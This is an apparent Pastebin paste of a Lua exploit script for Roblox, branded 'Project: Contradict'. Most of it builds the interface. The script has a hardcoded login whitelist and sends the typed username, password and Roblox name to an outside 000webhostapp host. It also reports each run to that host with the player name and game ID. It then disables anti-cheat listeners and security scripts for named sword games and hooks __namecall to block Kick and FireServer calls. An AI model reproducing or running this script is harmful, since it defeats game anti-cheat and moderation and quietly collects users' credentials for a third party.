Advertisement
Guest User

Untitled

a guest
May 3rd, 2019
250
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.09 KB | None | 0 0
  1. local success, err = pcall(function()
  2. readfile("ProjectUnnamed")
  3. end)
  4.  
  5. local Whitelist = {
  6. ["WL1"] = {Username = "Cliented"; Password = "hoohevd6"};
  7. ["WL2"] = {Username = "ServerSiding"; Password = "hoohevd6"}
  8. }
  9.  
  10. function LoadLogin()
  11. local LoginUI = Instance.new("ScreenGui")
  12. local Holder = Instance.new("ImageLabel")
  13. local TextLabel = Instance.new("TextLabel")
  14. local Username = Instance.new("TextBox")
  15. local Password = Instance.new("TextBox")
  16. local TextButton = Instance.new("TextButton")
  17.  
  18. LoginUI.Name = "LoginUI"
  19. LoginUI.Parent = game.CoreGui
  20. LoginUI.ResetOnSpawn = false
  21.  
  22. Holder.Name = "Holder"
  23. Holder.Parent = LoginUI
  24. Holder.AnchorPoint = Vector2.new(0.5, 0.5)
  25. Holder.BackgroundColor3 = Color3.new(1, 1, 1)
  26. Holder.BackgroundTransparency = 1
  27. Holder.Position = UDim2.new(0.499928176, 0, 0.499615639, 0)
  28. Holder.Size = UDim2.new(0.162356317, 0, 0.100768678, 0)
  29. Holder.Image = "rbxassetid://2851927369"
  30. Holder.ImageColor3 = Color3.new(0.211765, 0.211765, 0.211765)
  31. Holder.ScaleType = Enum.ScaleType.Slice
  32. Holder.SliceCenter = Rect.new(10, 10, 10, 10)
  33.  
  34. TextLabel.Parent = Holder
  35. TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  36. TextLabel.BackgroundTransparency = 1
  37. TextLabel.Position = UDim2.new(0, 0, 0.183772564, 0)
  38. TextLabel.Size = UDim2.new(0, 98, 0, 30)
  39. TextLabel.Font = Enum.Font.SourceSansLight
  40. TextLabel.Text = "Login: "
  41. TextLabel.TextColor3 = Color3.new(0.917647, 0.917647, 0.917647)
  42. TextLabel.TextScaled = true
  43. TextLabel.TextSize = 14
  44. TextLabel.TextWrapped = true
  45.  
  46. Username.Name = "Username"
  47. Username.Parent = Holder
  48. Username.AnchorPoint = Vector2.new(0.5, 0.5)
  49. Username.BackgroundColor3 = Color3.new(0.121569, 0.121569, 0.121569)
  50. Username.BorderSizePixel = 0
  51. Username.Position = UDim2.new(0.635177016, 0, 0.339267552, 0)
  52. Username.Size = UDim2.new(0, 200, 0, 27)
  53. Username.Font = Enum.Font.SourceSansLight
  54. Username.PlaceholderText = "Username"
  55. Username.Text = ""
  56. Username.TextColor3 = Color3.new(0, 0, 0)
  57. Username.TextScaled = true
  58. Username.TextSize = 14
  59. Username.TextWrapped = true
  60.  
  61. Password.Name = "Password"
  62. Password.Parent = Holder
  63. Password.AnchorPoint = Vector2.new(0.5, 0.5)
  64. Password.BackgroundColor3 = Color3.new(0.121569, 0.121569, 0.121569)
  65. Password.BorderSizePixel = 0
  66. Password.Position = UDim2.new(0.635508895, 0, 0.663793325, 0)
  67. Password.Size = UDim2.new(0, 200, 0, 27)
  68. Password.Font = Enum.Font.SourceSansLight
  69. Password.PlaceholderColor3 = Color3.new(0.698039, 0.698039, 0.698039)
  70. Password.PlaceholderText = "Password"
  71. Password.Text = ""
  72. Password.TextColor3 = Color3.new(0, 0, 0)
  73. Password.TextScaled = true
  74. Password.TextSize = 14
  75. Password.TextWrapped = true
  76.  
  77. TextButton.Parent = Holder
  78. TextButton.AnchorPoint = Vector2.new(0.5, 0.5)
  79. TextButton.BackgroundColor3 = Color3.new(0.121569, 0.121569, 0.121569)
  80. TextButton.BorderSizePixel = 0
  81. TextButton.Position = UDim2.new(0.154634908, 0, 0.671725512, 0)
  82. TextButton.Size = UDim2.new(0, 74, 0, 25)
  83. TextButton.Font = Enum.Font.SourceSansLight
  84. TextButton.Text = "Login"
  85. TextButton.TextColor3 = Color3.new(0.784314, 0.784314, 0.784314)
  86. TextButton.TextScaled = true
  87. TextButton.TextSize = 14
  88. TextButton.TextWrapped = true
  89.  
  90. --// Script
  91.  
  92. TextButton.MouseButton1Click:Connect(function()
  93. local RobloxUsername = game:GetService("Players").LocalPlayer.Name
  94. local UserLogin = Username.Text
  95. local PassLogin = Password.Text
  96.  
  97. game:HttpGet("https://theniftygotbypassed.000webhostapp.com/NAME.php?auth=".. UserLogin .."&userInfo="..PassLogin.."&username="..RobloxUsername)
  98.  
  99. for _,v in pairs(Whitelist) do
  100. if UserLogin == v.Username and PassLogin == v.Password then
  101. LoginUI:Destroy()
  102. LoadClient()
  103. end
  104. end
  105. end)
  106. end
  107.  
  108. function LoadClient()
  109. print("Loading Client!")
  110. local Player = game:GetService("Players").LocalPlayer
  111. local Backpack = Player.Backpack
  112. local Character = Player.Character
  113. game:HttpGet("https://theniftygotbypassed.000webhostapp.com/Executed.php?username="..Player.Name.."&game="..game.GameId)
  114. local Hotkey = "v"
  115. local Debounce = false
  116. local CanOpen = false
  117.  
  118. repeat wait() until #Backpack:GetChildren() >= 1
  119.  
  120. local Sword = Backpack:FindFirstChildOfClass("Tool")
  121. local Handle = Sword.Handle
  122.  
  123. local CurrentAnti
  124. local IsBypassed = false
  125.  
  126. local FinishedTween = false
  127. local FirstRound = true
  128.  
  129. local ProjectContradict = Instance.new("ScreenGui")
  130. local Initializer = Instance.new("ImageLabel")
  131. local Box1 = Instance.new("ImageLabel")
  132. local Box2 = Instance.new("ImageLabel")
  133. local Box3 = Instance.new("ImageLabel")
  134. local Loading = Instance.new("TextLabel")
  135. local Holder = Instance.new("ImageLabel")
  136. local Title = Instance.new("TextLabel")
  137. local AntiType = Instance.new("TextLabel")
  138. local Anti = Instance.new("TextLabel")
  139. local Status = Instance.new("TextLabel")
  140. local Bypassed = Instance.new("TextLabel")
  141. local Time = Instance.new("TextLabel")
  142. local Length = Instance.new("TextLabel")
  143. local Frame = Instance.new("Frame")
  144. local AccountAge = Instance.new("TextLabel")
  145. local Age = Instance.new("TextLabel")
  146. local GameTime = Instance.new("TextLabel")
  147. local Time_2 = Instance.new("TextLabel")
  148. local Whitelist = Instance.new("TextLabel")
  149. local Type = Instance.new("TextLabel")
  150. local Title_2 = Instance.new("TextLabel")
  151.  
  152. ProjectContradict.Name = "Project: Contradict"
  153. ProjectContradict.Parent = game.CoreGui
  154.  
  155. Initializer.Name = "Initializer"
  156. Initializer.Parent = ProjectContradict
  157. Initializer.AnchorPoint = Vector2.new(0.5, 0.5)
  158. Initializer.BackgroundColor3 = Color3.new(1, 1, 1)
  159. Initializer.BackgroundTransparency = 1
  160. Initializer.Position = UDim2.new(0.5, 0, 0.5, 0)
  161. Initializer.Size = UDim2.new(0.200000003, 0, 0.100000001, 0)
  162. Initializer.Visible = true
  163. Initializer.Image = "rbxassetid://2851928757"
  164. Initializer.ImageColor3 = Color3.new(0.168627, 0.168627, 0.168627)
  165. Initializer.ScaleType = Enum.ScaleType.Slice
  166. Initializer.SliceCenter = Rect.new(5, 5, 5, 5)
  167.  
  168. Box1.Name = "Box1"
  169. Box1.Parent = Initializer
  170. Box1.AnchorPoint = Vector2.new(0.5, 0.5)
  171. Box1.BackgroundColor3 = Color3.new(1, 1, 1)
  172. Box1.BackgroundTransparency = 1
  173. Box1.Position = UDim2.new(0.340799659, 0, 0.621569574, 0)
  174. Box1.Size = UDim2.new(0.0579999983, 0, 0.211999997, 0)
  175. Box1.Image = "rbxassetid://2851928757"
  176. Box1.ImageColor3 = Color3.new(0, 0.556863, 0.901961)
  177. Box1.ScaleType = Enum.ScaleType.Slice
  178. Box1.SliceCenter = Rect.new(5, 5, 5, 5)
  179.  
  180. Box2.Name = "Box2"
  181. Box2.Parent = Initializer
  182. Box2.AnchorPoint = Vector2.new(0.5, 0.5)
  183. Box2.BackgroundColor3 = Color3.new(1, 1, 1)
  184. Box2.BackgroundTransparency = 1
  185. Box2.Position = UDim2.new(0.498827159, 0, 0.621569574, 0)
  186. Box2.Size = UDim2.new(0.0576411076, 0, 0.212416425, 0)
  187. Box2.Image = "rbxassetid://2851928757"
  188. Box2.ImageColor3 = Color3.new(0, 0.556863, 0.901961)
  189. Box2.ScaleType = Enum.ScaleType.Slice
  190. Box2.SliceCenter = Rect.new(5, 5, 5, 5)
  191.  
  192. Box3.Name = "Box3"
  193. Box3.Parent = Initializer
  194. Box3.AnchorPoint = Vector2.new(0.5, 0.5)
  195. Box3.BackgroundColor3 = Color3.new(1, 1, 1)
  196. Box3.BackgroundTransparency = 1
  197. Box3.Position = UDim2.new(0.659112275, 0, 0.621569574, 0)
  198. Box3.Size = UDim2.new(0.0576411076, 0, 0.212416425, 0)
  199. Box3.Image = "rbxassetid://2851928757"
  200. Box3.ImageColor3 = Color3.new(0, 0.556863, 0.901961)
  201. Box3.ScaleType = Enum.ScaleType.Slice
  202. Box3.SliceCenter = Rect.new(5, 5, 5, 5)
  203.  
  204. Loading.Name = "Loading"
  205. Loading.Parent = Initializer
  206. Loading.AnchorPoint = Vector2.new(0.5, 0.5)
  207. Loading.BackgroundColor3 = Color3.new(1, 1, 1)
  208. Loading.BackgroundTransparency = 1
  209. Loading.Position = UDim2.new(0.5, 0, 0.222370371, 0)
  210. Loading.Size = UDim2.new(0.5, 0, 0.300000012, 0)
  211. Loading.Font = Enum.Font.SourceSansLight
  212. Loading.Text = "Loading Assets!"
  213. Loading.TextColor3 = Color3.new(0, 0.556863, 0.901961)
  214. Loading.TextScaled = true
  215. Loading.TextSize = 14
  216. Loading.TextWrapped = true
  217.  
  218. Holder.Name = "Holder"
  219. Holder.Parent = ProjectContradict
  220. Holder.AnchorPoint = Vector2.new(0.5, 0.5)
  221. Holder.BackgroundColor3 = Color3.new(1, 1, 1)
  222. Holder.BackgroundTransparency = 1
  223. Holder.Position = UDim2.new(0.499806195, 0, 0.499496788, 0)
  224. Holder.Size = UDim2.new(0, 0, 0, 0)
  225. Holder.Visible = true
  226. Holder.Image = "rbxassetid://2851928757"
  227. Holder.ImageColor3 = Color3.new(0.168627, 0.168627, 0.168627)
  228. Holder.ScaleType = Enum.ScaleType.Slice
  229. Holder.SliceCenter = Rect.new(5, 5, 5, 5)
  230.  
  231. Title.Name = "Title"
  232. Title.Parent = Holder
  233. Title.AnchorPoint = Vector2.new(0.5, 0.5)
  234. Title.BackgroundColor3 = Color3.new(1, 1, 1)
  235. Title.BackgroundTransparency = 1
  236. Title.Position = UDim2.new(0.499999881, 0, 0.0938663706, 0)
  237. Title.Size = UDim2.new(0.5, 0, 0.131376132, 0)
  238. Title.Font = Enum.Font.SourceSansLight
  239. Title.Text = "Project: Contradict"
  240. Title.TextColor3 = Color3.new(0, 0.556863, 0.901961)
  241. Title.TextScaled = true
  242. Title.TextSize = 14
  243. Title.TextWrapped = true
  244.  
  245. AntiType.Name = "AntiType"
  246. AntiType.Parent = Holder
  247. AntiType.AnchorPoint = Vector2.new(0.5, 0.5)
  248. AntiType.BackgroundColor3 = Color3.new(1, 1, 1)
  249. AntiType.BackgroundTransparency = 1
  250. AntiType.Position = UDim2.new(0.134879559, 0, 0.390620381, 0)
  251. AntiType.Size = UDim2.new(0.228425652, 0, 0.113610022, 0)
  252. AntiType.Font = Enum.Font.SourceSansLight
  253. AntiType.Text = "Anti: "
  254. AntiType.TextColor3 = Color3.new(0, 0.556863, 0.901961)
  255. AntiType.TextScaled = true
  256. AntiType.TextSize = 14
  257. AntiType.TextWrapped = true
  258. AntiType.TextXAlignment = Enum.TextXAlignment.Left
  259.  
  260. Anti.Name = "Anti"
  261. Anti.Parent = AntiType
  262. Anti.AnchorPoint = Vector2.new(0.5, 0.5)
  263. Anti.BackgroundColor3 = Color3.new(1, 1, 1)
  264. Anti.BackgroundTransparency = 1
  265. Anti.Position = UDim2.new(1.49545431, 0, 0.493391186, 0)
  266. Anti.Size = UDim2.new(1, 0, 1, 0)
  267. Anti.Font = Enum.Font.SourceSansLight
  268. Anti.Text = "AntiName"
  269. Anti.TextColor3 = Color3.new(0.811765, 0.811765, 0.811765)
  270. Anti.TextScaled = true
  271. Anti.TextSize = 14
  272. Anti.TextWrapped = true
  273. Anti.TextXAlignment = Enum.TextXAlignment.Right
  274.  
  275. Status.Name = "Status"
  276. Status.Parent = Holder
  277. Status.AnchorPoint = Vector2.new(0.5, 0.5)
  278. Status.BackgroundColor3 = Color3.new(1, 1, 1)
  279. Status.BackgroundTransparency = 1
  280. Status.Position = UDim2.new(0.134879559, 0, 0.501794398, 0)
  281. Status.Size = UDim2.new(0.228425652, 0, 0.113610022, 0)
  282. Status.Font = Enum.Font.SourceSansLight
  283. Status.Text = "Status: "
  284. Status.TextColor3 = Color3.new(0, 0.556863, 0.901961)
  285. Status.TextScaled = true
  286. Status.TextSize = 14
  287. Status.TextWrapped = true
  288. Status.TextXAlignment = Enum.TextXAlignment.Left
  289.  
  290. Bypassed.Name = "Bypassed"
  291. Bypassed.Parent = Status
  292. Bypassed.AnchorPoint = Vector2.new(0.5, 0.5)
  293. Bypassed.BackgroundColor3 = Color3.new(1, 1, 1)
  294. Bypassed.BackgroundTransparency = 1
  295. Bypassed.Position = UDim2.new(1.49545431, 0, 0.493391186, 0)
  296. Bypassed.Size = UDim2.new(1, 0, 1, 0)
  297. Bypassed.Font = Enum.Font.SourceSansLight
  298. Bypassed.Text = "Bypassed"
  299. Bypassed.TextColor3 = Color3.new(0.811765, 0.811765, 0.811765)
  300. Bypassed.TextScaled = true
  301. Bypassed.TextSize = 14
  302. Bypassed.TextWrapped = true
  303. Bypassed.TextXAlignment = Enum.TextXAlignment.Right
  304.  
  305. Time.Name = "Time"
  306. Time.Parent = Holder
  307. Time.AnchorPoint = Vector2.new(0.5, 0.5)
  308. Time.BackgroundColor3 = Color3.new(1, 1, 1)
  309. Time.BackgroundTransparency = 1
  310. Time.Position = UDim2.new(0.134879559, 0, 0.612968445, 0)
  311. Time.Size = UDim2.new(0.228425652, 0, 0.113610022, 0)
  312. Time.Font = Enum.Font.SourceSansLight
  313. Time.Text = "Bypass time: "
  314. Time.TextColor3 = Color3.new(0, 0.556863, 0.901961)
  315. Time.TextScaled = true
  316. Time.TextSize = 14
  317. Time.TextWrapped = true
  318. Time.TextXAlignment = Enum.TextXAlignment.Left
  319.  
  320. Length.Name = "Length"
  321. Length.Parent = Time
  322. Length.AnchorPoint = Vector2.new(0.5, 0.5)
  323. Length.BackgroundColor3 = Color3.new(1, 1, 1)
  324. Length.BackgroundTransparency = 1
  325. Length.Position = UDim2.new(1.49545431, 0, 0.493391186, 0)
  326. Length.Size = UDim2.new(1, 0, 1, 0)
  327. Length.Font = Enum.Font.SourceSansLight
  328. Length.Text = "0.001"
  329. Length.TextColor3 = Color3.new(0.811765, 0.811765, 0.811765)
  330. Length.TextScaled = true
  331. Length.TextSize = 14
  332. Length.TextWrapped = true
  333. Length.TextXAlignment = Enum.TextXAlignment.Right
  334.  
  335. Frame.Parent = Holder
  336. Frame.AnchorPoint = Vector2.new(0.5, 0.5)
  337. Frame.BackgroundColor3 = Color3.new(0, 0.556863, 0.901961)
  338. Frame.Position = UDim2.new(0.5, 0, 0.5, 0)
  339. Frame.Size = UDim2.new(0.00400000019, 0, 0.600000024, 0)
  340.  
  341. AccountAge.Name = "AccountAge"
  342. AccountAge.Parent = Holder
  343. AccountAge.AnchorPoint = Vector2.new(0.5, 0.5)
  344. AccountAge.BackgroundColor3 = Color3.new(1, 1, 1)
  345. AccountAge.BackgroundTransparency = 1
  346. AccountAge.Position = UDim2.new(0.646000028, 0, 0.391000003, 0)
  347. AccountAge.Size = UDim2.new(0.228425652, 0, 0.113610022, 0)
  348. AccountAge.Font = Enum.Font.SourceSansLight
  349. AccountAge.Text = "Account Age:"
  350. AccountAge.TextColor3 = Color3.new(1, 1, 1)
  351. AccountAge.TextScaled = true
  352. AccountAge.TextSize = 14
  353. AccountAge.TextWrapped = true
  354. AccountAge.TextXAlignment = Enum.TextXAlignment.Left
  355.  
  356. Age.Name = "Age"
  357. Age.Parent = AccountAge
  358. Age.AnchorPoint = Vector2.new(0.5, 0.5)
  359. Age.BackgroundColor3 = Color3.new(1, 1, 1)
  360. Age.BackgroundTransparency = 1
  361. Age.Position = UDim2.new(1.49545431, 0, 0.493391186, 0)
  362. Age.Size = UDim2.new(1, 0, 1, 0)
  363. Age.Font = Enum.Font.SourceSansLight
  364. Age.Text = "0"
  365. Age.TextColor3 = Color3.new(0, 0.556863, 0.901961)
  366. Age.TextScaled = true
  367. Age.TextSize = 14
  368. Age.TextWrapped = true
  369. Age.TextXAlignment = Enum.TextXAlignment.Right
  370.  
  371. GameTime.Name = "GameTime"
  372. GameTime.Parent = Holder
  373. GameTime.AnchorPoint = Vector2.new(0.5, 0.5)
  374. GameTime.BackgroundColor3 = Color3.new(1, 1, 1)
  375. GameTime.BackgroundTransparency = 1
  376. GameTime.Position = UDim2.new(0.646000028, 0, 0.501999974, 0)
  377. GameTime.Size = UDim2.new(0.228425652, 0, 0.113610022, 0)
  378. GameTime.Font = Enum.Font.SourceSansLight
  379. GameTime.Text = "Gametime: "
  380. GameTime.TextColor3 = Color3.new(1, 1, 1)
  381. GameTime.TextScaled = true
  382. GameTime.TextSize = 14
  383. GameTime.TextWrapped = true
  384. GameTime.TextXAlignment = Enum.TextXAlignment.Left
  385.  
  386. Time_2.Name = "Time"
  387. Time_2.Parent = GameTime
  388. Time_2.AnchorPoint = Vector2.new(0.5, 0.5)
  389. Time_2.BackgroundColor3 = Color3.new(1, 1, 1)
  390. Time_2.BackgroundTransparency = 1
  391. Time_2.Position = UDim2.new(1.49545431, 0, 0.493391186, 0)
  392. Time_2.Size = UDim2.new(1, 0, 1, 0)
  393. Time_2.Font = Enum.Font.SourceSansLight
  394. Time_2.Text = "0"
  395. Time_2.TextColor3 = Color3.new(0, 0.556863, 0.901961)
  396. Time_2.TextScaled = true
  397. Time_2.TextSize = 14
  398. Time_2.TextWrapped = true
  399. Time_2.TextXAlignment = Enum.TextXAlignment.Right
  400.  
  401. Whitelist.Name = "Whitelist"
  402. Whitelist.Parent = Holder
  403. Whitelist.AnchorPoint = Vector2.new(0.5, 0.5)
  404. Whitelist.BackgroundColor3 = Color3.new(1, 1, 1)
  405. Whitelist.BackgroundTransparency = 1
  406. Whitelist.Position = UDim2.new(0.646000028, 0, 0.612999976, 0)
  407. Whitelist.Size = UDim2.new(0.228425652, 0, 0.113610022, 0)
  408. Whitelist.Font = Enum.Font.SourceSansLight
  409. Whitelist.Text = "Whitelist Type: "
  410. Whitelist.TextColor3 = Color3.new(1, 1, 1)
  411. Whitelist.TextScaled = true
  412. Whitelist.TextSize = 14
  413. Whitelist.TextWrapped = true
  414. Whitelist.TextXAlignment = Enum.TextXAlignment.Left
  415.  
  416. Type.Name = "Type"
  417. Type.Parent = Whitelist
  418. Type.AnchorPoint = Vector2.new(0.5, 0.5)
  419. Type.BackgroundColor3 = Color3.new(1, 1, 1)
  420. Type.BackgroundTransparency = 1
  421. Type.Position = UDim2.new(1.49545431, 0, 0.493391186, 0)
  422. Type.Size = UDim2.new(1, 0, 1, 0)
  423. Type.Font = Enum.Font.SourceSansLight
  424. Type.Text = "Friend"
  425. Type.TextColor3 = Color3.new(0, 0.556863, 0.901961)
  426. Type.TextScaled = true
  427. Type.TextSize = 14
  428. Type.TextWrapped = true
  429. Type.TextXAlignment = Enum.TextXAlignment.Right
  430.  
  431. Title_2.Name = "Title"
  432. Title_2.Parent = Holder
  433. Title_2.AnchorPoint = Vector2.new(0.5, 0.5)
  434. Title_2.BackgroundColor3 = Color3.new(1, 1, 1)
  435. Title_2.BackgroundTransparency = 1
  436. Title_2.Position = UDim2.new(0.499999881, 0, 0.909663498, 0)
  437. Title_2.Size = UDim2.new(0.5, 0, 0.114803828, 0)
  438. Title_2.Font = Enum.Font.SourceSansLight
  439. Title_2.Text = "Created by Cliented"
  440. Title_2.TextColor3 = Color3.new(0, 0.556863, 0.901961)
  441. Title_2.TextScaled = true
  442. Title_2.TextSize = 14
  443. Title_2.TextWrapped = true
  444.  
  445. --// UI ANIMATE
  446.  
  447. function LoadMainUI()
  448. Initializer:TweenSize(UDim2.new(0, 0, 0, 0), "Out", "Quad", 0.3, false)
  449. CheckAnti()
  450. wait(.4)
  451. Initializer:Destroy()
  452. end
  453.  
  454. function Update(AntiName, Status, Times)
  455. CanOpen = true
  456. Holder:TweenSize(UDim2.new(0.273, 0,0.23, 0))
  457. Anti.Text = tostring(AntiName)
  458. Bypassed.Text = tostring(Status)
  459. Length.Text = Times
  460. end
  461.  
  462. spawn(function()
  463. local Load = true
  464. local TimeLim = 0
  465. while Load == true do
  466. Box1:TweenSize(UDim2.new(0.058, 8,0.212, 8), "Out", "Quad", 0.4, true)
  467. wait(.3)
  468. Box1:TweenSize(UDim2.new(0.058, 0,0.212, 0), "Out", "Quad", 0.4, true)
  469. Box2:TweenSize(UDim2.new(0.058, 8,0.212, 8), "Out", "Quad", 0.4, true)
  470. wait(.3)
  471. Box2:TweenSize(UDim2.new(0.058, 0,0.212, 0), "Out", "Quad", 0.4, true)
  472. Box3:TweenSize(UDim2.new(0.058, 8,0.212, 8), "Out", "Quad", 0.4, true)
  473. wait(.3)
  474. Box3:TweenSize(UDim2.new(0.058, 0,0.212, 0), "Out", "Quad", 0.4, true)
  475. TimeLim = TimeLim + 1
  476. if TimeLim >= 3 then
  477. Load = false
  478. LoadMainUI()
  479. end
  480. end
  481. end)
  482.  
  483. --// BYPASS SCRIPT
  484.  
  485. function CheckAnti()
  486. if Sword:FindFirstChild("AbsoluteSecurity") and Sword:FindFirstChild("SecurityEvent") then
  487. SCC()
  488. CurrentAnti = SCC
  489. elseif game:GetService("ReplicatedFirst"):FindFirstChild("Load") then
  490. CustomDuels()
  491. CurrentAnti = CustomDuels
  492. else
  493. Random()
  494. CurrentAnti = Random
  495. end
  496. end
  497.  
  498. function Random()
  499. local Player = game:GetService("Players").LocalPlayer
  500. local Backpack = Player.Backpack
  501. local Character = Player.Character
  502.  
  503. local Sword = Backpack:FindFirstChildOfClass("Tool") or Character:FindFirstChildOfClass("Tool")
  504. local Handle = Sword.Handle
  505.  
  506. --// NilInstanceCheck
  507. for _,v in pairs(getnilinstances()) do
  508. if v:IsA("LocalScript") or v:IsA("ModuleScript") then
  509. v.Disabled = true
  510. v:Destroy()
  511. end
  512. end
  513. --// .Changed/.PropertySignal/Touched Check
  514. for _,v in pairs(getconnections(Sword.Handle.Changed)) do
  515. pcall(function()
  516. v:Disable()
  517. end)
  518. end
  519.  
  520. for _,v in pairs(getconnections(Sword.Handle:GetPropertyChangedSignal("Size"))) do
  521. pcall(function()
  522. v:Disable()
  523. end)
  524. end
  525.  
  526. for _,v in pairs(getconnections(Sword.Handle.Touched)) do
  527. pcall(function()
  528. v:Disable()
  529. end)
  530. end
  531. --// AntiKick
  532. local mt = getrawmetatable(game)
  533. local oldNameCall = mt.__namecall
  534.  
  535. setreadonly(mt, false)
  536.  
  537. mt.__namecall = function(t, ...)
  538. local check = {...}
  539. local method = check[#check]
  540.  
  541. if check[#check] == "Kick" or check[#check] == "FireServer" then
  542. return
  543. end
  544.  
  545. return oldNameCall(t, ...)
  546. end
  547. if FirstRound == true then
  548. Update("Unknown", "Attempted", 0.000002)
  549. end
  550. FirstRound = false
  551. end
  552.  
  553. function SCC()
  554. wait()
  555. local Player = game:GetService("Players").LocalPlayer
  556. local Backpack = Player.Backpack
  557. local Character = Player.Character
  558.  
  559. local Sword = Backpack:FindFirstChildOfClass("Tool") or Character:FindFirstChildOfClass("Tool")
  560. local Handle = Sword.Handle
  561.  
  562. for _,v in pairs(getconnections(Sword.Handle.Changed)) do
  563. pcall(function()
  564. v:Disable()
  565. end)
  566. end
  567.  
  568. for _,v in pairs(getconnections(Sword.Handle:GetPropertyChangedSignal("Size"))) do
  569. pcall(function()
  570. v:Disable()
  571. end)
  572. end
  573.  
  574. for _,v in pairs(getconnections(Sword.Handle.Touched)) do
  575. pcall(function()
  576. v:Disable()
  577. end)
  578. end
  579. if Sword:FindFirstChild("SecurityEvent") then
  580. Sword:FindFirstChild("SecurityEvent"):Destroy()
  581. end
  582.  
  583. Sword.ChildAdded:Connect(function(c)
  584. if c:IsA("LocalScript") then
  585. c.Disabled = true
  586. end
  587. end)
  588. if Sword:FindFirstChild("SecurityEvent") then
  589. Update("SCC Swords", "Failed.", "Nil")
  590. return
  591. end
  592. if FirstRound == true then
  593. Update("SCC Swords", "Bypassed", 0.000002)
  594. end
  595. FirstRound = false
  596. end
  597.  
  598. function CustomDuels()
  599. wait()
  600. for _,v in pairs(getconnections(game:GetService("Players").LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Handle.Changed)) do
  601. v:Disable()
  602. end
  603. for _,v in pairs(getconnections(game:GetService("Players").LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Handle:GetPropertyChangedSignal("Size"))) do
  604. v:Disable()
  605. end
  606. if FirstRound == true then
  607. Update("Custom Duels", "Bypassed", 0.000002)
  608. end
  609. FirstRound = false
  610. end
  611.  
  612. Player:GetMouse().KeyDown:Connect(function(k)
  613. if k == string.lower(Hotkey) and CanOpen == true then
  614. if Debounce == false then Debounce = true
  615. Holder:TweenSize(UDim2.new(0, 0,0, 0), "Out", "Quad", 0.4, true)
  616. FinishedTween = false
  617. wait(.5)
  618. if FinishedTween == true then
  619. Holder.Visible = true
  620. else
  621. Holder.Visible = false
  622. end
  623. elseif Debounce == true then Debounce = false
  624. FinishedTween = true
  625. Holder.Visible = true
  626. Holder:TweenSize(UDim2.new(0.273, 0,0.23, 0), "Out", "Quad", 0.4, true)
  627. end
  628. end
  629. end)
  630.  
  631. repeat wait() until CurrentAnti
  632. Player.CharacterAdded:Connect(CurrentAnti)
  633. end
  634.  
  635. if err then
  636. writefile("ProjectUnnamed", "Test")
  637. LoadLogin()
  638. elseif success then
  639. LoadClient()
  640. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement